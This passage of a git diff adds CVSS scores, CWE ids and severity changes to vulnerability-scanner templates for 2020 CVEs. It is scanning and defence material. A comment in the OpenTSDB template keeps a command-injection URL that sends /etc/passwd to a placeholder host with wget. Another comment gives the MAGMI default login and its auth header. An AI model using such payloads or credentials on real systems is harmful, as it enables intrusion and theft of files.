CVE-2020-27735 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-27866.yaml b/cves/2020/CVE-2020-27866.yaml index cc13503b5f..81151b66a4 100644 --- a/cves/2020/CVE-2020-27866.yaml +++ b/cves/2020/CVE-2020-27866.yaml @@ -11,6 +11,11 @@ info: - https://www.zerodayinitiative.com/advisories/ZDI-20-1451/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866 - https://kb.netgear.com/000062641/Security-Advisory-for-Password-Recovery-Vulnerabilities-on-Some-Routers + classification: + cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-27866 + cwe-id: CWE-288 requests: - raw: diff --git a/cves/2020/CVE-2020-27982.yaml b/cves/2020/CVE-2020-27982.yaml index 91159315d6..f46b932a44 100644 --- a/cves/2020/CVE-2020-27982.yaml +++ b/cves/2020/CVE-2020-27982.yaml @@ -6,6 +6,11 @@ info: description: IceWarp 11.4.5.0 allows XSS via the language parameter. reference: https://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html tags: cve,cve2020,xss,icewarp + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-27982 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-27986.yaml b/cves/2020/CVE-2020-27986.yaml index dcb73a8bf5..d33b9d2de3 100644 --- a/cves/2020/CVE-2020-27986.yaml +++ b/cves/2020/CVE-2020-27986.yaml @@ -3,13 +3,18 @@ id: CVE-2020-27986 info: name: SonarQube unauth author: pikpikcu - severity: medium + severity: high description: | SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI. NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it." reference: https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/ tags: cve,cve2020,sonarqube + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-27986 + cwe-id: CWE-306,CWE-312 requests: - method: GET diff --git a/cves/2020/CVE-2020-28188.yaml b/cves/2020/CVE-2020-28188.yaml index e511013c53..45c1ee460a 100644 --- a/cves/2020/CVE-2020-28188.yaml +++ b/cves/2020/CVE-2020-28188.yaml @@ -10,6 +10,11 @@ info: - https://www.pentest.com.tr/exploits/TerraMaster-TOS-4-2-06-Unauthenticated-Remote-Code-Execution.html - https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/ tags: cve,cve2020,terramaster,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-28188 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2020/CVE-2020-28208.yaml b/cves/2020/CVE-2020-28208.yaml index e320eb589c..135292b076 100644 --- a/cves/2020/CVE-2020-28208.yaml +++ b/cves/2020/CVE-2020-28208.yaml @@ -7,6 +7,11 @@ info: description: An email address enumeration vulnerability exists in the password reset function of Rocket.Chat through 3.9.1. reference: https://trovent.io/security-advisory-2010-01 tags: cve,cve2020,rockethchat + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-28208 + cwe-id: CWE-203 requests: - raw: diff --git a/cves/2020/CVE-2020-28871.yaml b/cves/2020/CVE-2020-28871.yaml index 4e77e68e53..d8708d874c 100644 --- a/cves/2020/CVE-2020-28871.yaml +++ b/cves/2020/CVE-2020-28871.yaml @@ -10,6 +10,11 @@ info: - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/ - https://www.exploit-db.com/exploits/48980 tags: cve,cve2020,monitorr,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-28871 + cwe-id: CWE-434 requests: - raw: diff --git a/cves/2020/CVE-2020-28976.yaml b/cves/2020/CVE-2020-28976.yaml index 3ecd474e88..a271437130 100644 --- a/cves/2020/CVE-2020-28976.yaml +++ b/cves/2020/CVE-2020-28976.yaml @@ -3,12 +3,17 @@ id: CVE-2020-28976 info: name: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated) author: LogicalHunter - severity: high + severity: medium description: The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker to make a request to any internal and external server via /includes/lib/detail.php?subdomain=SSRF. reference: - https://www.exploit-db.com/exploits/49189 - https://nvd.nist.gov/vuln/detail/CVE-2020-28976 tags: cve,cve2020,ssrf,wordpress,wp-plugin,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-28976 + cwe-id: CWE-918 requests: - method: GET diff --git a/cves/2020/CVE-2020-29164.yaml b/cves/2020/CVE-2020-29164.yaml index 753c1c727b..9ff125238d 100644 --- a/cves/2020/CVE-2020-29164.yaml +++ b/cves/2020/CVE-2020-29164.yaml @@ -7,6 +7,11 @@ info: severity: medium tags: pacsone,xss,cve,cve2020 reference: https://gist.github.com/leommxj/0a32afeeaac960682c5b7c9ca8ed070d + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-29164 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-29227.yaml b/cves/2020/CVE-2020-29227.yaml index 469d3e038c..b22baeb363 100644 --- a/cves/2020/CVE-2020-29227.yaml +++ b/cves/2020/CVE-2020-29227.yaml @@ -3,12 +3,16 @@ id: CVE-2020-29227 info: name: Car Rental Management System 1.0 - Local File Inclusion (LFI) author: daffainfo - severity: high + severity: critical description: An issue was discovered in Car Rental Management System 1.0. An unauthenticated user can perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, to cause local file inclusion resulting in code execution. reference: - https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5 - https://nvd.nist.gov/vuln/detail/CVE-2020-29227 tags: cve,cve2020,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-29227 requests: - method: GET diff --git a/cves/2020/CVE-2020-29395.yaml b/cves/2020/CVE-2020-29395.yaml index 1072df2e03..ca81ff5115 100644 --- a/cves/2020/CVE-2020-29395.yaml +++ b/cves/2020/CVE-2020-29395.yaml @@ -9,6 +9,11 @@ info: - https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS - https://nvd.nist.gov/vuln/detail/CVE-2020-29395 tags: cve,cve2020,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-29395 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-29453.yaml b/cves/2020/CVE-2020-29453.yaml index 3e39b3447e..447eb86dbf 100644 --- a/cves/2020/CVE-2020-29453.yaml +++ b/cves/2020/CVE-2020-29453.yaml @@ -7,6 +7,11 @@ info: description: The CachingResourceDownloadRewriteRule class in Jira Server and Jira Data Center allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check. reference: https://jira.atlassian.com/browse/JRASERVER-72014 tags: cve,cve2020,atlassian,jira,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-29453 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-3187.yaml b/cves/2020/CVE-2020-3187.yaml index 346ae735d7..10db5b0e82 100644 --- a/cves/2020/CVE-2020-3187.yaml +++ b/cves/2020/CVE-2020-3187.yaml @@ -3,13 +3,18 @@ id: CVE-2020-3187 info: name: CVE-2020-3187 author: KareemSe1im - severity: high + severity: critical description: A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and obtain read and delete access to sensitive files on a targeted system. reference: - https://twitter.com/aboul3la/status/1286809567989575685 - http://packetstormsecurity.com/files/158648/Cisco-Adaptive-Security-Appliance-Software-9.7-Arbitrary-File-Deletion.html - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-path-JE3azWw43 tags: cve,cve2020,cisco + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.10 + cve-id: CVE-2020-3187 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-3452.yaml b/cves/2020/CVE-2020-3452.yaml index 1a5f9d3e7f..5ffc08cf18 100644 --- a/cves/2020/CVE-2020-3452.yaml +++ b/cves/2020/CVE-2020-3452.yaml @@ -3,7 +3,7 @@ id: CVE-2020-3452 info: name: CVE-2020-3452 author: pdteam - severity: medium + severity: high description: | A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files. reference: @@ -14,6 +14,11 @@ info: - http://packetstormsecurity.com/files/160497/Cisco-ASA-9.14.1.10-FTD-6.6.0.1-Path-Traversal.html - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86 tags: cve,cve2020,cisco,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-3452 + cwe-id: CWE-20 requests: - method: GET diff --git a/cves/2020/CVE-2020-35338.yaml b/cves/2020/CVE-2020-35338.yaml index 2470e2c195..205fad22a0 100644 --- a/cves/2020/CVE-2020-35338.yaml +++ b/cves/2020/CVE-2020-35338.yaml @@ -10,6 +10,11 @@ info: - https://jeyaseelans.medium.com/cve-2020-35338-9e841f48defa tags: cve,cve2020,wmt,default-login + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35338 + cwe-id: CWE-798 requests: - method: GET path: diff --git a/cves/2020/CVE-2020-35476.yaml b/cves/2020/CVE-2020-35476.yaml index a73f95890b..a84417bce6 100644 --- a/cves/2020/CVE-2020-35476.yaml +++ b/cves/2020/CVE-2020-35476.yaml @@ -10,6 +10,11 @@ info: # Extracting /etc/passwd to remote host:- # /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20--post-file%20/etc/passwd%20http://my-host%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35476 + cwe-id: CWE-78 requests: - method: GET diff --git a/cves/2020/CVE-2020-35489.yaml b/cves/2020/CVE-2020-35489.yaml index bac1875c05..e183ae1ea7 100644 --- a/cves/2020/CVE-2020-35489.yaml +++ b/cves/2020/CVE-2020-35489.yaml @@ -7,6 +7,11 @@ info: description: The contact-form-7 (aka Contact Form 7) plugin before 5.3.2 for WordPress allows Unrestricted File Upload and remote code execution because a filename may contain special characters. reference: https://nvd.nist.gov/vuln/detail/CVE-2020-35489 tags: cve,cve2020,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2020-35489 + cwe-id: CWE-434 requests: - method: GET diff --git a/cves/2020/CVE-2020-35580.yaml b/cves/2020/CVE-2020-35580.yaml index c5fa22a091..1f23d2e4e6 100644 --- a/cves/2020/CVE-2020-35580.yaml +++ b/cves/2020/CVE-2020-35580.yaml @@ -7,6 +7,11 @@ info: description: Local File Inclusion vulnerability in the FileServlet in all SearchBlox before 9.2.2 allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url= request. Additionally, this may be used to read the contents of the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which contains both the Super Admin API key and the base64 encoded SHA1 password hashes of other SearchBlox users. reference: https://hateshape.github.io/general/2021/05/11/CVE-2020-35580.html tags: cve,cve2020,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-35580 + cwe-id: CWE-522 requests: - method: GET diff --git a/cves/2020/CVE-2020-35598.yaml b/cves/2020/CVE-2020-35598.yaml index fe1febddde..435cffabbd 100644 --- a/cves/2020/CVE-2020-35598.yaml +++ b/cves/2020/CVE-2020-35598.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/49343 - https://www.cvedetails.com/cve/CVE-2020-35598 tags: cve,cve2020,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-35598 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-35713.yaml b/cves/2020/CVE-2020-35713.yaml index a5e9540ba2..fd466fe1a3 100644 --- a/cves/2020/CVE-2020-35713.yaml +++ b/cves/2020/CVE-2020-35713.yaml @@ -7,6 +7,11 @@ info: reference: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page. tags: cve,cve2020,linksys,rce,oob,router + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35713 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2020/CVE-2020-35729.yaml b/cves/2020/CVE-2020-35729.yaml index f0af5aa3ab..632c7a5aad 100644 --- a/cves/2020/CVE-2020-35729.yaml +++ b/cves/2020/CVE-2020-35729.yaml @@ -19,6 +19,11 @@ info: Originated from Metasploit module, copyright (c) space-r7. tags: cve,cve2020,klog,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35729 + cwe-id: CWE-78 requests: - method: POST diff --git a/cves/2020/CVE-2020-35736.yaml b/cves/2020/CVE-2020-35736.yaml index c2bfce5c8b..377a1e0aa0 100644 --- a/cves/2020/CVE-2020-35736.yaml +++ b/cves/2020/CVE-2020-35736.yaml @@ -9,6 +9,11 @@ info: - https://github.com/liftoff/GateOne/issues/747 - https://nvd.nist.gov/vuln/detail/CVE-2020-35736 tags: cve,cve2020,gateone,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-35736 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-35774.yaml b/cves/2020/CVE-2020-35774.yaml index e772c16eec..072b62d728 100644 --- a/cves/2020/CVE-2020-35774.yaml +++ b/cves/2020/CVE-2020-35774.yaml @@ -8,6 +8,11 @@ info: server/handler/HistogramQueryHandler.scala in Twitter TwitterServer (aka twitter-server) before 20.12.0, in some configurations, allows XSS via the /histograms endpoint. reference: https://nvd.nist.gov/vuln/detail/CVE-2020-35774 tags: cve,cve2020,xss,twitter-server + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-35774 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-3580.yaml b/cves/2020/CVE-2020-3580.yaml index af6da1dcfa..8b32f9ef9f 100644 --- a/cves/2020/CVE-2020-3580.yaml +++ b/cves/2020/CVE-2020-3580.yaml @@ -10,6 +10,11 @@ info: description: | Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section. tags: cve,cve2020,xss,cisco + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-3580 + cwe-id: CWE-79 requests: - raw: diff --git a/cves/2020/CVE-2020-35846.yaml b/cves/2020/CVE-2020-35846.yaml index 35f6119a3c..2cb08ab7d4 100644 --- a/cves/2020/CVE-2020-35846.yaml +++ b/cves/2020/CVE-2020-35846.yaml @@ -9,6 +9,11 @@ info: The $eq operator matches documents where the value of a field equals the specified value. reference: https://swarm.ptsecurity.com/rce-cockpit-cms/ tags: cve,cve2020,nosqli,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35846 + cwe-id: CWE-89 requests: - method: POST diff --git a/cves/2020/CVE-2020-35847.yaml b/cves/2020/CVE-2020-35847.yaml index 2226a19d6f..9d33adc30f 100644 --- a/cves/2020/CVE-2020-35847.yaml +++ b/cves/2020/CVE-2020-35847.yaml @@ -9,6 +9,11 @@ info: which is responsible for changing the user password using the reset token. reference: https://swarm.ptsecurity.com/rce-cockpit-cms/ tags: cve,cve2020,nosqli,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35847 + cwe-id: CWE-89 requests: - method: POST diff --git a/cves/2020/CVE-2020-35848.yaml b/cves/2020/CVE-2020-35848.yaml index 9e693b11c7..3b1a7d649a 100644 --- a/cves/2020/CVE-2020-35848.yaml +++ b/cves/2020/CVE-2020-35848.yaml @@ -9,6 +9,11 @@ info: which is responsible for displaying the user password reset form. reference: https://swarm.ptsecurity.com/rce-cockpit-cms/ tags: cve,cve2020,nosqli,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35848 + cwe-id: CWE-89 requests: - method: POST diff --git a/cves/2020/CVE-2020-35951.yaml b/cves/2020/CVE-2020-35951.yaml index 835ccc29ed..0ab49a2bc9 100644 --- a/cves/2020/CVE-2020-35951.yaml +++ b/cves/2020/CVE-2020-35951.yaml @@ -8,6 +8,11 @@ info: An issue was discovered in the Quiz and Survey Master plugin before 7.0.1 for WordPress. It allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files). reference: https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/ tags: cve,cve2020,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H + cvss-score: 9.90 + cve-id: CVE-2020-35951 + cwe-id: CWE-306 requests: - raw: diff --git a/cves/2020/CVE-2020-36112.yaml b/cves/2020/CVE-2020-36112.yaml index def510535d..474b9b212a 100644 --- a/cves/2020/CVE-2020-36112.yaml +++ b/cves/2020/CVE-2020-36112.yaml @@ -9,6 +9,11 @@ info: - https://www.tenable.com/cve/CVE-2020-36112 severity: critical tags: cve,cve2020,sqli,cse + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-36112 + cwe-id: CWE-89 requests: - raw: diff --git a/cves/2020/CVE-2020-36289.yaml b/cves/2020/CVE-2020-36289.yaml index 9b1cb65ed5..134c4160f8 100644 --- a/cves/2020/CVE-2020-36289.yaml +++ b/cves/2020/CVE-2020-36289.yaml @@ -9,6 +9,11 @@ info: reference: - https://twitter.com/ptswarm/status/1402644004781633540 - https://nvd.nist.gov/vuln/detail/CVE-2020-36289 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-36289 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2020/CVE-2020-4463.yaml b/cves/2020/CVE-2020-4463.yaml index cff4fd841a..96e904d323 100644 --- a/cves/2020/CVE-2020-4463.yaml +++ b/cves/2020/CVE-2020-4463.yaml @@ -14,6 +14,11 @@ info: - https://www.ibm.com/support/pages/security-bulletin-ibm-maximo-asset-management-vulnerable-information-disclosure-cve-2020-4463 - https://github.com/Ibonok/CVE-2020-4463 tags: cve,cve2020,ibm,xxe + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L + cvss-score: 8.20 + cve-id: CVE-2020-4463 + cwe-id: CWE-611 requests: - method: POST diff --git a/cves/2020/CVE-2020-5284.yaml b/cves/2020/CVE-2020-5284.yaml index 90ae483682..97a56c996e 100644 --- a/cves/2020/CVE-2020-5284.yaml +++ b/cves/2020/CVE-2020-5284.yaml @@ -9,6 +9,11 @@ info: reference: https://github.com/zeit/next.js/releases/tag/v9.3.2 https://github.com/zeit/next.js/security/advisories/GHSA-fq77-7p7r-83rj + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.30 + cve-id: CVE-2020-5284 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-5307.yaml b/cves/2020/CVE-2020-5307.yaml index 6107fbb57a..160406214c 100644 --- a/cves/2020/CVE-2020-5307.yaml +++ b/cves/2020/CVE-2020-5307.yaml @@ -8,6 +8,11 @@ info: - https://cinzinga.com/CVE-2020-5307-5308/ severity: critical tags: cve,cve2020,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-5307 + cwe-id: CWE-89 requests: - raw: diff --git a/cves/2020/CVE-2020-5405.yaml b/cves/2020/CVE-2020-5405.yaml index a103e34d12..4a7aa0348f 100644 --- a/cves/2020/CVE-2020-5405.yaml +++ b/cves/2020/CVE-2020-5405.yaml @@ -3,10 +3,15 @@ id: CVE-2020-5405 info: name: Spring Cloud Directory Traversal author: harshbothra_ - severity: high + severity: medium description: Spring Cloud Config, versions 2.2.x prior to 2.2.2, versions 2.1.x prior to 2.1.7, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead a directory traversal attack. reference: https://pivotal.io/security/cve-2020-5405 tags: cve,cve2020,lfi,springcloud + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N + cvss-score: 6.50 + cve-id: CVE-2020-5405 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-5410.yaml b/cves/2020/CVE-2020-5410.yaml index 773e721bae..d4f7de242d 100644 --- a/cves/2020/CVE-2020-5410.yaml +++ b/cves/2020/CVE-2020-5410.yaml @@ -7,6 +7,11 @@ info: description: Spring Cloud Config, versions 2.2.x prior to 2.2.3, versions 2.1.x prior to 2.1.9, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead to a directory traversal attack. reference: https://tanzu.vmware.com/security/cve-2020-5410 tags: cve,cve2020,lfi,springcloud + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-5410 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-5412.yaml b/cves/2020/CVE-2020-5412.yaml index a0b1eac7af..dad8fbb3f9 100644 --- a/cves/2020/CVE-2020-5412.yaml +++ b/cves/2020/CVE-2020-5412.yaml @@ -7,6 +7,11 @@ info: description: Spring Cloud Netflix, versions 2.2.x prior to 2.2.4, versions 2.1.x prior to 2.1.6, and older unsupported versions allow applications to use the Hystrix Dashboard proxy.stream endpoint to make requests to any server reachable by the server hosting the dashboard. A malicious user, or attacker, can send a request to other servers that should not be exposed publicly. tags: cve,cve2020,ssrf,springcloud reference: https://tanzu.vmware.com/security/cve-2020-5412 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2020-5412 + cwe-id: CWE-610 requests: - method: GET diff --git a/cves/2020/CVE-2020-5776.yaml b/cves/2020/CVE-2020-5776.yaml index 513a3be8c5..23edf290ed 100644 --- a/cves/2020/CVE-2020-5776.yaml +++ b/cves/2020/CVE-2020-5776.yaml @@ -11,6 +11,11 @@ info: # Due to the lack of CSRF tokens, RCE (via phpcli command) is possible # in the event that a CSRF is leveraged against an existing admin session for MAGMI. # At the time of this advisory, no patch exists for this issue. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-5776 + cwe-id: CWE-352 requests: - raw: diff --git a/cves/2020/CVE-2020-5777.yaml b/cves/2020/CVE-2020-5777.yaml index 6dbfb02778..ad90884501 100644 --- a/cves/2020/CVE-2020-5777.yaml +++ b/cves/2020/CVE-2020-5777.yaml @@ -3,7 +3,7 @@ id: CVE-2020-5777 info: name: Remote Auth Bypass in MAGMI (Magento Mass Importer) Plugin <= v0.7.23 author: dwisiswant0 - severity: high + severity: critical description: MAGMI versions prior to 0.7.24 are vulnerable to a remote authentication bypass due to allowing default credentials in the event there is a database connection failure. reference: https://github.com/dweeves/magmi-git/blob/18bd9ec905c90bfc9eaed0c2bf2d3525002e33b9/magmi/inc/magmi_auth.php#L35 tags: cve,cve2020,magmi,magento @@ -12,6 +12,11 @@ info: # While the Db connection is down, you can access http://[TARGET]/magmi/web/magmi.php # with default credential "magmi:magmi" (Authorization: Basic bWFnbWk6bWFnbWk=) # Tested on a AWS t2.medium with max_connection = 75 and PHP-FPM pm-max_children = 100 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-5777 + cwe-id: CWE-287 requests: - raw: diff --git a/cves/2020/CVE-2020-5847.yaml b/cves/2020/CVE-2020-5847.yaml index 08d43a9cd4..176b2b2136 100644 --- a/cves/2020/CVE-2020-5847.yaml +++ b/cves/2020/CVE-2020-5847.yaml @@ -2,10 +2,15 @@ id: CVE-2020-5847 info: name: UnRaid Remote Code Execution author: madrobot - severity: high + severity: critical description: A vulnerability in UnRaid allows remote unauthenticated attackers to execute arbitrary code. reference: https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/ tags: cve,cve2020,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-5847 + cwe-id: CWE-94,CWE-668 requests: - method: GET diff --git a/cves/2020/CVE-2020-5902.yaml b/cves/2020/CVE-2020-5902.yaml index e55a8ef228..c8698e5e5f 100644 --- a/cves/2020/CVE-2020-5902.yaml +++ b/cves/2020/CVE-2020-5902.yaml @@ -3,7 +3,7 @@ id: CVE-2020-5902 info: name: F5 BIG-IP TMUI RCE author: madrobot,dwisiswant0,ringo - severity: high + severity: critical description: In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. reference: - http://packetstormsecurity.com/files/158333/BIG-IP-TMUI-Remote-Code-Execution.html @@ -18,6 +18,11 @@ info: - https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/ - https://www.kb.cert.org/vuls/id/290915 tags: cve,cve2020,bigip,rce + classification: + cvss-metrics: 